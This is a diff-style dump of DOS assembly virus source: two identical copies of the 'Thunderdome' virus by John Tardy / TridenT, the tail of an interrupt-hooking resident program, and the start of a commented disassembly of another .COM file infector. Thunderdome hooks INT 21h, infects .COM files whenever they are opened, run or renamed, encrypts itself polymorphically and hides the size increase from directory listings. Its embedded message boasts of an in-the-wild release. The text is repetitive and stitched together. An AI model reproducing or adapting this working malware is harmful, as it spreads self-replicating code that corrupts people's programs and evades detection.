mov ax,3521h
|
||||
int 21h
|
||||
mov di,offset oi21
|
||||
mov [di],bx
|
||||
mov [di+2],es
|
||||
mov dx,offset ni21
|
||||
push cs
|
||||
pop ds
|
||||
mov ax,2521h
|
||||
int 21h
|
||||
mov dx,offset lits
|
||||
int 27h
|
||||
cseg ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,403 @@
|
|||
;
|
||||
; Thunderdome virus by John Tardy / TridenT
|
||||
;
|
||||
|
||||
Org 0h
|
||||
|
||||
decr: jmp Crypt
|
||||
db 'Carcass'
|
||||
Loopje DB 0e2h
|
||||
db 0fah
|
||||
DecrLen Equ $-Decr
|
||||
|
||||
Crypt: Push Ax
|
||||
call Get_Ofs
|
||||
Get_Ofs: pop Bp
|
||||
sub Bp,Get_Ofs
|
||||
|
||||
Mov Ah,2ah
|
||||
Int 21h
|
||||
Cmp Cx,1993
|
||||
Ja Makeya
|
||||
jb Installed
|
||||
Cmp Dh,10
|
||||
Jb installed
|
||||
|
||||
|
||||
Makeya: Mov Ax,0DEADh
|
||||
Int 21h
|
||||
Cmp Ax,0AAAAh
|
||||
Je Installed
|
||||
|
||||
mov ax,3521h
|
||||
int 21h
|
||||
mov word ptr cs:old21[bp],bx
|
||||
mov word ptr cs:old21[bp][2],es
|
||||
|
||||
mov ax,cs
|
||||
dec ax
|
||||
mov ds,ax
|
||||
cmp byte ptr ds:[0000],'Z'
|
||||
jne installed
|
||||
mov ax,word ptr ds:[0003]
|
||||
sub ax,ParLen
|
||||
jb installed
|
||||
mov word ptr ds:[0003],ax
|
||||
sub word ptr ds:[0012h],ParLen
|
||||
lea si,decr[bp]
|
||||
xor di,di
|
||||
mov es,ds:[12h]
|
||||
mov ds,cs
|
||||
mov cx,virlen
|
||||
rep movsb
|
||||
mov ax,2521h
|
||||
mov ds,es
|
||||
mov dx,offset new21
|
||||
int 21h
|
||||
Installed: Mov Di,100h
|
||||
Push Di
|
||||
Lea Si,Org_Prg[Bp]
|
||||
Push Cs
|
||||
Pop Ds
|
||||
Push Cs
|
||||
Pop Es
|
||||
Movsw
|
||||
Movsb
|
||||
Pop Bx
|
||||
Pop Ax
|
||||
Jmp Bx
|
||||
|
||||
Old21 dd 0
|
||||
|
||||
New21: cmp ax,0deadh
|
||||
jne chkfunc
|
||||
mov cx,0aaaah
|
||||
mov ax,cx
|
||||
iret
|
||||
chkfunc: cmp ah,12h
|
||||
je findFCBst
|
||||
cmp ah,11h
|
||||
je findfcbst
|
||||
cmp ah,4fh
|
||||
je findst
|
||||
cmp ah,4eh
|
||||
je findst
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push bp
|
||||
push ds
|
||||
push es
|
||||
cmp ah,3dh
|
||||
je infectHan
|
||||
cmp ah,4bh
|
||||
je infectHan
|
||||
cmp ah,41h
|
||||
je infectHan
|
||||
cmp ah,43h
|
||||
je infectHan
|
||||
cmp ah,56h
|
||||
je infectHan
|
||||
cmp ah,0fh
|
||||
je infectFCB
|
||||
cmp ah,23h
|
||||
je infectFCB
|
||||
cmp ah,6ch
|
||||
je infectdos4
|
||||
jmp endint
|
||||
|
||||
findfcbst: jmp findfcb
|
||||
findst: jmp find
|
||||
|
||||
InfectFCB: mov si,dx
|
||||
lodsb
|
||||
push cs
|
||||
pop es
|
||||
lea di,fnam
|
||||
mov cx,8
|
||||
rep movsb
|
||||
mov cx,3
|
||||
inc di
|
||||
rep movsb
|
||||
lea dx,fnam
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
InfectHan: mov si,dx
|
||||
mov cx,100h
|
||||
findpnt: lodsb
|
||||
cmp al,'.'
|
||||
je chkcom
|
||||
loop findpnt
|
||||
jmp endi
|
||||
|
||||
infectdos4: and dx,0fh
|
||||
cmp dx,1
|
||||
jne endi
|
||||
mov dx,si
|
||||
jmp infecthan
|
||||
|
||||
chkcom: lodsw
|
||||
or ax,2020h
|
||||
cmp ax,'oc'
|
||||
jne endi
|
||||
lodsb
|
||||
or al,20h
|
||||
cmp al,'m'
|
||||
je doitj
|
||||
endi: jmp endint
|
||||
doitj: push dx
|
||||
push ds
|
||||
mov ax,4300h
|
||||
call dos
|
||||
mov cs:fatr,cx
|
||||
mov ax,4301h
|
||||
sub cx,cx
|
||||
call dos
|
||||
mov ax,3d02h
|
||||
call dos
|
||||
jnc getdate
|
||||
jmp error
|
||||
getdate: mov bx,5700h
|
||||
xchg ax,bx
|
||||
call dos
|
||||
mov cs:fdat,cx
|
||||
mov cs:fdat+2,dx
|
||||
and cx,1fh
|
||||
cmp cx,1fh
|
||||
jne chkexe
|
||||
jmp done
|
||||
chkexe: mov ah,3fh
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,Org_prg
|
||||
mov cx,3
|
||||
call dos
|
||||
cmp word ptr cs:Org_prg[0],'MZ'
|
||||
je close
|
||||
cmp word ptr cs:Org_prg[0],'ZM'
|
||||
je close
|
||||
|
||||
Mov ax,4202h
|
||||
sub cx,cx
|
||||
cwd
|
||||
call dos
|
||||
|
||||
sub ax,3
|
||||
mov cs:jump[1],ax
|
||||
|
||||
Add Ax,Offset Crypt+103h
|
||||
Mov S_1[1],Ax
|
||||
Mov S_2[1],Ax
|
||||
Mov S_3[4],Ax
|
||||
Mov S_4[4],Ax
|
||||
Call GenPoly
|
||||
|
||||
mov ah,40h
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,coder
|
||||
mov cx,virlen
|
||||
call dos
|
||||
|
||||
mov ax,4200h
|
||||
xor cx,cx
|
||||
cwd
|
||||
call dos
|
||||
|
||||
mov ah,40h
|
||||
lea dx,jump
|
||||
mov cx,3
|
||||
call dos
|
||||
|
||||
or cs:fdat,01fh
|
||||
|
||||
close: mov ax,5701h
|
||||
mov cx,cs:fdat
|
||||
mov dx,cs:fdat[2]
|
||||
call dos
|
||||
|
||||
done: mov ah,3eh
|
||||
call dos
|
||||
pop ds
|
||||
pop dx
|
||||
push dx
|
||||
push ds
|
||||
mov ax,4301h
|
||||
mov cx,fatr
|
||||
call dos
|
||||
|
||||
error: pop ds
|
||||
pop dx
|
||||
|
||||
endint: pop es
|
||||
pop ds
|
||||
pop bp
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
jmp d ptr cs:[old21]
|
||||
|
||||
GenPoly: Xor Byte Ptr [Loopje],2
|
||||
Xor Ax,Ax
|
||||
Mov Es,Ax
|
||||
Mov Ax,Es:[46ch]
|
||||
Mov Es,Cs
|
||||
Push Ax
|
||||
And Ax,07ffh
|
||||
Add Ax,CryptLen
|
||||
Mov S_1[4],Ax
|
||||
Mov S_2[4],Ax
|
||||
Mov S_3[1],Ax
|
||||
Mov S_4[1],Ax
|
||||
Doit: Pop Ax
|
||||
Push Ax
|
||||
And Ax,3
|
||||
Shl Ax,1
|
||||
Mov Si,Ax
|
||||
Mov Ax,W Table[Si]
|
||||
Mov Si,Ax
|
||||
Lea Di,decr
|
||||
Movsw
|
||||
Movsw
|
||||
Movsw
|
||||
Movsw
|
||||
Pop Ax
|
||||
Stosb
|
||||
Movsb
|
||||
Mov Dl,Al
|
||||
Lea Si,Decr
|
||||
Lea Di,Coder
|
||||
Mov Cx,DecrLen
|
||||
Rep Movsb
|
||||
Lea Si,Crypt
|
||||
Mov Cx,CryptLen
|
||||
Encrypt: Lodsb
|
||||
Xor Al,Dl
|
||||
Stosb
|
||||
Loop Encrypt
|
||||
Cmp Dl,0
|
||||
Je Fuckit
|
||||
Ret
|
||||
|
||||
FuckIt: Lea Si,Encr0
|
||||
Lea Di,Coder
|
||||
Mov Cx,Encr0Len
|
||||
Rep Movsb
|
||||
Mov Ax,Cs:jump[1]
|
||||
Add Ax,Encr0Len+2
|
||||
Mov Cs:jump[1],Ax
|
||||
Ret
|
||||
|
||||
Db 13,10,'Created in Holland, released near Bolzano/Italy.'
|
||||
Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
|
||||
Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
|
||||
Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
|
||||
Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
|
||||
Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
|
||||
Db 13,10,'Greetings go to all other virus writers!'
|
||||
|
||||
Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
|
||||
|
||||
S_1: Lea Si,0
|
||||
Mov Cx,0
|
||||
DB 80h,34h
|
||||
Inc Si
|
||||
S_2: Lea Di,0
|
||||
Mov Cx,0
|
||||
DB 80h,35h
|
||||
Inc Di
|
||||
S_3: Mov Cx,0
|
||||
Lea Si,0
|
||||
DB 80h,34h
|
||||
Inc Si
|
||||
S_4: Mov Cx,0
|
||||
Lea Di,0
|
||||
DB 80h,35h
|
||||
Inc Di
|
||||
|
||||
Db '[ "Thunderdome" virus by '
|
||||
|
||||
Encr0 Db 'John Tardy'
|
||||
Encr0Len Equ $-Encr0
|
||||
|
||||
Db ' / TridenT ]'
|
||||
|
||||
getdta: pop si
|
||||
pushf
|
||||
push ax
|
||||
push bx
|
||||
push es
|
||||
mov ah,2fh
|
||||
call dos
|
||||
jmp short si
|
||||
|
||||
FindFCB: call DOS
|
||||
cmp al,0
|
||||
jne Ret1
|
||||
call getdta
|
||||
cmp byte ptr es:[bx],-1
|
||||
jne FCBOk
|
||||
add bx,8
|
||||
FCBOk: mov al,es:[bx+16h]
|
||||
and al,1fh
|
||||
cmp al,1fh
|
||||
jne FileOk
|
||||
sub word ptr es:[bx+1ch],Virlen
|
||||
sbb word ptr es:[bx+1eh],0
|
||||
jmp short Time
|
||||
|
||||
Find: call DOS
|
||||
jc Ret1
|
||||
call getdta
|
||||
mov al,es:[bx+16h]
|
||||
and al,1fh
|
||||
cmp al,1fh
|
||||
jne FileOk
|
||||
sub word ptr es:[bx+1ah],VirLen
|
||||
sbb word ptr es:[bx+1ch],0
|
||||
Time: xor byte ptr es:[bx+16h],10h
|
||||
FileOk: pop es
|
||||
pop bx
|
||||
pop ax
|
||||
popf
|
||||
Ret1: retf 2
|
||||
|
||||
dos: pushf
|
||||
call dword ptr cs:[old21]
|
||||
ret
|
||||
|
||||
Org_prg dw 0cd90h
|
||||
db 20h
|
||||
|
||||
fnam db 8 dup (0)
|
||||
db '.'
|
||||
db 3 dup (0)
|
||||
db 0
|
||||
fatr dw 0
|
||||
fdat dw 0,0
|
||||
|
||||
|
||||
jump db 0e9h,0,0
|
||||
|
||||
ResLen Equ ($-Decr)/10h
|
||||
|
||||
ParLen Equ (Reslen*2)+10h
|
||||
|
||||
CryptLen Equ $-Crypt
|
||||
|
||||
VirLen Equ $-Decr
|
||||
|
||||
Coder Equ $
|
||||
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
@ -0,0 +1,403 @@
|
|||
;
|
||||
; Thunderdome virus by John Tardy / TridenT
|
||||
;
|
||||
|
||||
Org 0h
|
||||
|
||||
decr: jmp Crypt
|
||||
db 'Carcass'
|
||||
Loopje DB 0e2h
|
||||
db 0fah
|
||||
DecrLen Equ $-Decr
|
||||
|
||||
Crypt: Push Ax
|
||||
call Get_Ofs
|
||||
Get_Ofs: pop Bp
|
||||
sub Bp,Get_Ofs
|
||||
|
||||
Mov Ah,2ah
|
||||
Int 21h
|
||||
Cmp Cx,1993
|
||||
Ja Makeya
|
||||
jb Installed
|
||||
Cmp Dh,10
|
||||
Jb installed
|
||||
|
||||
|
||||
Makeya: Mov Ax,0DEADh
|
||||
Int 21h
|
||||
Cmp Ax,0AAAAh
|
||||
Je Installed
|
||||
|
||||
mov ax,3521h
|
||||
int 21h
|
||||
mov word ptr cs:old21[bp],bx
|
||||
mov word ptr cs:old21[bp][2],es
|
||||
|
||||
mov ax,cs
|
||||
dec ax
|
||||
mov ds,ax
|
||||
cmp byte ptr ds:[0000],'Z'
|
||||
jne installed
|
||||
mov ax,word ptr ds:[0003]
|
||||
sub ax,ParLen
|
||||
jb installed
|
||||
mov word ptr ds:[0003],ax
|
||||
sub word ptr ds:[0012h],ParLen
|
||||
lea si,decr[bp]
|
||||
xor di,di
|
||||
mov es,ds:[12h]
|
||||
mov ds,cs
|
||||
mov cx,virlen
|
||||
rep movsb
|
||||
mov ax,2521h
|
||||
mov ds,es
|
||||
mov dx,offset new21
|
||||
int 21h
|
||||
Installed: Mov Di,100h
|
||||
Push Di
|
||||
Lea Si,Org_Prg[Bp]
|
||||
Push Cs
|
||||
Pop Ds
|
||||
Push Cs
|
||||
Pop Es
|
||||
Movsw
|
||||
Movsb
|
||||
Pop Bx
|
||||
Pop Ax
|
||||
Jmp Bx
|
||||
|
||||
Old21 dd 0
|
||||
|
||||
New21: cmp ax,0deadh
|
||||
jne chkfunc
|
||||
mov cx,0aaaah
|
||||
mov ax,cx
|
||||
iret
|
||||
chkfunc: cmp ah,12h
|
||||
je findFCBst
|
||||
cmp ah,11h
|
||||
je findfcbst
|
||||
cmp ah,4fh
|
||||
je findst
|
||||
cmp ah,4eh
|
||||
je findst
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push bp
|
||||
push ds
|
||||
push es
|
||||
cmp ah,3dh
|
||||
je infectHan
|
||||
cmp ah,4bh
|
||||
je infectHan
|
||||
cmp ah,41h
|
||||
je infectHan
|
||||
cmp ah,43h
|
||||
je infectHan
|
||||
cmp ah,56h
|
||||
je infectHan
|
||||
cmp ah,0fh
|
||||
je infectFCB
|
||||
cmp ah,23h
|
||||
je infectFCB
|
||||
cmp ah,6ch
|
||||
je infectdos4
|
||||
jmp endint
|
||||
|
||||
findfcbst: jmp findfcb
|
||||
findst: jmp find
|
||||
|
||||
InfectFCB: mov si,dx
|
||||
lodsb
|
||||
push cs
|
||||
pop es
|
||||
lea di,fnam
|
||||
mov cx,8
|
||||
rep movsb
|
||||
mov cx,3
|
||||
inc di
|
||||
rep movsb
|
||||
lea dx,fnam
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
InfectHan: mov si,dx
|
||||
mov cx,100h
|
||||
findpnt: lodsb
|
||||
cmp al,'.'
|
||||
je chkcom
|
||||
loop findpnt
|
||||
jmp endi
|
||||
|
||||
infectdos4: and dx,0fh
|
||||
cmp dx,1
|
||||
jne endi
|
||||
mov dx,si
|
||||
jmp infecthan
|
||||
|
||||
chkcom: lodsw
|
||||
or ax,2020h
|
||||
cmp ax,'oc'
|
||||
jne endi
|
||||
lodsb
|
||||
or al,20h
|
||||
cmp al,'m'
|
||||
je doitj
|
||||
endi: jmp endint
|
||||
doitj: push dx
|
||||
push ds
|
||||
mov ax,4300h
|
||||
call dos
|
||||
mov cs:fatr,cx
|
||||
mov ax,4301h
|
||||
sub cx,cx
|
||||
call dos
|
||||
mov ax,3d02h
|
||||
call dos
|
||||
jnc getdate
|
||||
jmp error
|
||||
getdate: mov bx,5700h
|
||||
xchg ax,bx
|
||||
call dos
|
||||
mov cs:fdat,cx
|
||||
mov cs:fdat+2,dx
|
||||
and cx,1fh
|
||||
cmp cx,1fh
|
||||
jne chkexe
|
||||
jmp done
|
||||
chkexe: mov ah,3fh
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,Org_prg
|
||||
mov cx,3
|
||||
call dos
|
||||
cmp word ptr cs:Org_prg[0],'MZ'
|
||||
je close
|
||||
cmp word ptr cs:Org_prg[0],'ZM'
|
||||
je close
|
||||
|
||||
Mov ax,4202h
|
||||
sub cx,cx
|
||||
cwd
|
||||
call dos
|
||||
|
||||
sub ax,3
|
||||
mov cs:jump[1],ax
|
||||
|
||||
Add Ax,Offset Crypt+103h
|
||||
Mov S_1[1],Ax
|
||||
Mov S_2[1],Ax
|
||||
Mov S_3[4],Ax
|
||||
Mov S_4[4],Ax
|
||||
Call GenPoly
|
||||
|
||||
mov ah,40h
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,coder
|
||||
mov cx,virlen
|
||||
call dos
|
||||
|
||||
mov ax,4200h
|
||||
xor cx,cx
|
||||
cwd
|
||||
call dos
|
||||
|
||||
mov ah,40h
|
||||
lea dx,jump
|
||||
mov cx,3
|
||||
call dos
|
||||
|
||||
or cs:fdat,01fh
|
||||
|
||||
close: mov ax,5701h
|
||||
mov cx,cs:fdat
|
||||
mov dx,cs:fdat[2]
|
||||
call dos
|
||||
|
||||
done: mov ah,3eh
|
||||
call dos
|
||||
pop ds
|
||||
pop dx
|
||||
push dx
|
||||
push ds
|
||||
mov ax,4301h
|
||||
mov cx,fatr
|
||||
call dos
|
||||
|
||||
error: pop ds
|
||||
pop dx
|
||||
|
||||
endint: pop es
|
||||
pop ds
|
||||
pop bp
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
jmp d ptr cs:[old21]
|
||||
|
||||
GenPoly: Xor Byte Ptr [Loopje],2
|
||||
Xor Ax,Ax
|
||||
Mov Es,Ax
|
||||
Mov Ax,Es:[46ch]
|
||||
Mov Es,Cs
|
||||
Push Ax
|
||||
And Ax,07ffh
|
||||
Add Ax,CryptLen
|
||||
Mov S_1[4],Ax
|
||||
Mov S_2[4],Ax
|
||||
Mov S_3[1],Ax
|
||||
Mov S_4[1],Ax
|
||||
Doit: Pop Ax
|
||||
Push Ax
|
||||
And Ax,3
|
||||
Shl Ax,1
|
||||
Mov Si,Ax
|
||||
Mov Ax,W Table[Si]
|
||||
Mov Si,Ax
|
||||
Lea Di,decr
|
||||
Movsw
|
||||
Movsw
|
||||
Movsw
|
||||
Movsw
|
||||
Pop Ax
|
||||
Stosb
|
||||
Movsb
|
||||
Mov Dl,Al
|
||||
Lea Si,Decr
|
||||
Lea Di,Coder
|
||||
Mov Cx,DecrLen
|
||||
Rep Movsb
|
||||
Lea Si,Crypt
|
||||
Mov Cx,CryptLen
|
||||
Encrypt: Lodsb
|
||||
Xor Al,Dl
|
||||
Stosb
|
||||
Loop Encrypt
|
||||
Cmp Dl,0
|
||||
Je Fuckit
|
||||
Ret
|
||||
|
||||
FuckIt: Lea Si,Encr0
|
||||
Lea Di,Coder
|
||||
Mov Cx,Encr0Len
|
||||
Rep Movsb
|
||||
Mov Ax,Cs:jump[1]
|
||||
Add Ax,Encr0Len+2
|
||||
Mov Cs:jump[1],Ax
|
||||
Ret
|
||||
|
||||
Db 13,10,'Created in Holland, released near Bolzano/Italy.'
|
||||
Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not'
|
||||
Db 13,10,'ment to be destructive, however, some programs might not work anymore,'
|
||||
Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your'
|
||||
Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!'
|
||||
Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).'
|
||||
Db 13,10,'Greetings go to all other virus writers!'
|
||||
|
||||
Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4
|
||||
|
||||
S_1: Lea Si,0
|
||||
Mov Cx,0
|
||||
DB 80h,34h
|
||||
Inc Si
|
||||
S_2: Lea Di,0
|
||||
Mov Cx,0
|
||||
DB 80h,35h
|
||||
Inc Di
|
||||
S_3: Mov Cx,0
|
||||
Lea Si,0
|
||||
DB 80h,34h
|
||||
Inc Si
|
||||
S_4: Mov Cx,0
|
||||
Lea Di,0
|
||||
DB 80h,35h
|
||||
Inc Di
|
||||
|
||||
Db '[ "Thunderdome" virus by '
|
||||
|
||||
Encr0 Db 'John Tardy'
|
||||
Encr0Len Equ $-Encr0
|
||||
|
||||
Db ' / TridenT ]'
|
||||
|
||||
getdta: pop si
|
||||
pushf
|
||||
push ax
|
||||
push bx
|
||||
push es
|
||||
mov ah,2fh
|
||||
call dos
|
||||
jmp short si
|
||||
|
||||
FindFCB: call DOS
|
||||
cmp al,0
|
||||
jne Ret1
|
||||
call getdta
|
||||
cmp byte ptr es:[bx],-1
|
||||
jne FCBOk
|
||||
add bx,8
|
||||
FCBOk: mov al,es:[bx+16h]
|
||||
and al,1fh
|
||||
cmp al,1fh
|
||||
jne FileOk
|
||||
sub word ptr es:[bx+1ch],Virlen
|
||||
sbb word ptr es:[bx+1eh],0
|
||||
jmp short Time
|
||||
|
||||
Find: call DOS
|
||||
jc Ret1
|
||||
call getdta
|
||||
mov al,es:[bx+16h]
|
||||
and al,1fh
|
||||
cmp al,1fh
|
||||
jne FileOk
|
||||
sub word ptr es:[bx+1ah],VirLen
|
||||
sbb word ptr es:[bx+1ch],0
|
||||
Time: xor byte ptr es:[bx+16h],10h
|
||||
FileOk: pop es
|
||||
pop bx
|
||||
pop ax
|
||||
popf
|
||||
Ret1: retf 2
|
||||
|
||||
dos: pushf
|
||||
call dword ptr cs:[old21]
|
||||
ret
|
||||
|
||||
Org_prg dw 0cd90h
|
||||
db 20h
|
||||
|
||||
fnam db 8 dup (0)
|
||||
db '.'
|
||||
db 3 dup (0)
|
||||
db 0
|
||||
fatr dw 0
|
||||
fdat dw 0,0
|
||||
|
||||
|
||||
jump db 0e9h,0,0
|
||||
|
||||
ResLen Equ ($-Decr)/10h
|
||||
|
||||
ParLen Equ (Reslen*2)+10h
|
||||
|
||||
CryptLen Equ $-Crypt
|
||||
|
||||
VirLen Equ $-Decr
|
||||
|
||||
Coder Equ $
|
||||
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
@ -0,0 +1,785 @@
|
|||
; Start disassembly
|
||||
DATA_1E EQU 64H ; (761D:0064=0)
|
||||
DATA_2E EQU 66H ; (761D:0066=0)
|
||||
DATA_3E EQU 68H ; (761D:0068=0)
|
||||
DATA_10E EQU 4F43H ; (761D:4F43=0)
|
||||
DATA_11E EQU 504DH ; (761D:504D=0)
|
||||
|
||||
SEG_A SEGMENT
|
||||
ASSUME CS:SEG_A, DS:SEG_A
|
||||
|
||||
|
||||
ORG 100h
|
||||
|
||||
Time PROC FAR
|
||||
|
||||
start:
|
||||
JMP Virus_Entry_Point ;
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Original Program without 1st three bytes... ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
DATA_5 DB 9987 DUP (90H)
|
||||
MOV AH,4CH ;
|
||||
MOV AL,DATA_2 ; Terminate to DOS with
|
||||
INT 21H ; exitcode AL
|
||||
DB 0
|
||||
DATA_2 DB 0
|
||||
DB 0
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Virus Entry Point ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Virus_Entry_Point:
|
||||
JMP SHORT Set_Virus_Data_Point
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set Virus Data Storage Point ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Set_Virus_Data_Point:
|
||||
PUSH CX ; Store CX
|
||||
MOV DX,2B2DH ;
|
||||
MOV SI,DX ; SI points at start of
|
||||
; virus data
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Get DTA Address ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
PUSH ES ; Store ES
|
||||
MOV AH,2FH ; GET DTA address into
|
||||
INT 21H ; ES:BX
|
||||
MOV [SI],BX ; Store BX of DTA
|
||||
MOV [SI+2],ES ; Store ES of DTA
|
||||
POP ES ; Restore ES
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set new DTA Address ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV DX,4EH ;
|
||||
ADD DX,SI ;
|
||||
MOV AH,1AH ;
|
||||
INT 21H ; Set new DTA to DS:DX
|
||||
|
||||
PUSH SI ; Store SI
|
||||
CLD ; Clear direction
|
||||
MOV DI,SI ;
|
||||
ADD SI,0AH ;
|
||||
ADD DI,81H ;
|
||||
MOV CX,3 ; Move 3 bytes from source
|
||||
REP MOVSB ; to destination (E9h, 45h
|
||||
; 45h)
|
||||
POP SI ; Restore SI
|
||||
|
||||
PUSH ES ; Store ES
|
||||
PUSH SI ; Store SI
|
||||
PUSH BX ; Store BX
|
||||
MOV BX,2CH
|
||||
MOV AX,[BX] ; Get Extra Segment?
|
||||
POP BX ; Restore BX
|
||||
MOV ES,AX
|
||||
MOV DI,0
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
